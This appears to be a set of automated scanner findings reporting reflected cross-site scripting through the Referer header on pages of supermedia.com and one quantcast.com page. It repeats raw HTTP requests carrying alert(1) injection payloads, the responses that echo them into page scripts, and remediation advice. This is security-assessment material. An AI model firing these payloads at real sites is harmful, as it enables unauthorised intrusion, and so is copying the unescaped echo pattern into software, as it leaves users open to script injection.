Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p-aasG6JkxVvmNA HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ff882"><script>alert(1)</script>9cbb95e5ed5
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Date: Thu, 03 Feb 2011 22:03:05 GMT Expires: Wed, 02 Feb 2011 10:03:06 GMT Cache-control: private, max-age=0 Set-Cookie: qcVisitor=0|82|1296770586032|0|NOTSET; Expires=Sat, 26-Jan-2041 22:03:06 GMT; Path=/ Set-Cookie: JSESSIONID=44D9028629FFF99EE86CE90A605E6EC0; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48f6c"-alert(1)-"c33954f4f7b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /community/blog HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623; Referer: http://www.google.com/search?hl=en&q=48f6c"-alert(1)-"c33954f4f7b
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:27:36 GMT Content-Type: text/html;charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=48f6c"-alert(1)-"c33954f4f7b"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a79f"-alert(1)-"94d6ddab3a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:46:53 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20791
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=3a79f"-alert(1)-"94d6ddab3a8"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52554"-alert(1)-"ef1396cf41e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:20:10 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20791
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=52554"-alert(1)-"ef1396cf41e"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8c66"-alert(1)-"92f4c806eeb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:20:45 GMT Content-Type: text/html;charset=UTF-8 Connection: close Cache-Control: private Content-Length: 20754
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="d8c66"-alert(1)-"92f4c806eeb"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13f3c"-alert(1)-"f8f23428e65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /support/help/ HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623; Referer: 13f3c"-alert(1)-"f8f23428e65
Response (redirected)
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:22:54 GMT Content-Type: text/html;charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="13f3c"-alert(1)-"f8f23428e65"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1d1e"-alert(1)-"7bc6b80740c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yellow-pages/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;
Referer: e1d1e"-alert(1)-"7bc6b80740c
Response (redirected)
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:19 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="e1d1e"-alert(1)-"7bc6b80740c"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d0f4"-alert(1)-"3372c90867f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:11:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 30942
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=8d0f4"-alert(1)-"3372c90867f"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 327fc"-alert(1)-"221a82e08e1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:48:57 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=327fc"-alert(1)-"221a82e08e1"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ba03"-alert(1)-"bdea14bb63f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 18:00:31 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 30942
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=8ba03"-alert(1)-"bdea14bb63f"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecec8"-alert(1)-"4dc26327075 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:06:34 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20885
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=ecec8"-alert(1)-"4dc26327075"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44c7"-alert(1)-"c8e3ca72d49 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:26 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20904
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=e44c7"-alert(1)-"c8e3ca72d49"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0f11"-alert(1)-"6068412b7ff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/login.do HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b
Referer: http://www.google.com/search?hl=en&q=c0f11"-alert(1)-"6068412b7ff
Response (redirected)
HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 01:47:44 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=c0f11"-alert(1)-"6068412b7ff"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94ca4"-alert(1)-"a229106b012 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spportal/myaccount.do;jsessionid=CD1B75B428F192D4B130C351A3081BAE.app2-a1 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b
Referer: http://www.google.com/search?hl=en&q=94ca4"-alert(1)-"a229106b012
Response (redirected)
HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 01:48:17 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=94ca4"-alert(1)-"a229106b012"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 362e4"-alert(1)-"35b4846cf0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 20:27:16 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 20885
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=362e4"-alert(1)-"35b4846cf0a"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ffa4"-alert(1)-"6ce0b4aea6f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:19:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20424
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=2ffa4"-alert(1)-"6ce0b4aea6f"; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Unable to extract the flow definition id parameter ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa04d"-alert(1)-"18e25f0779e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
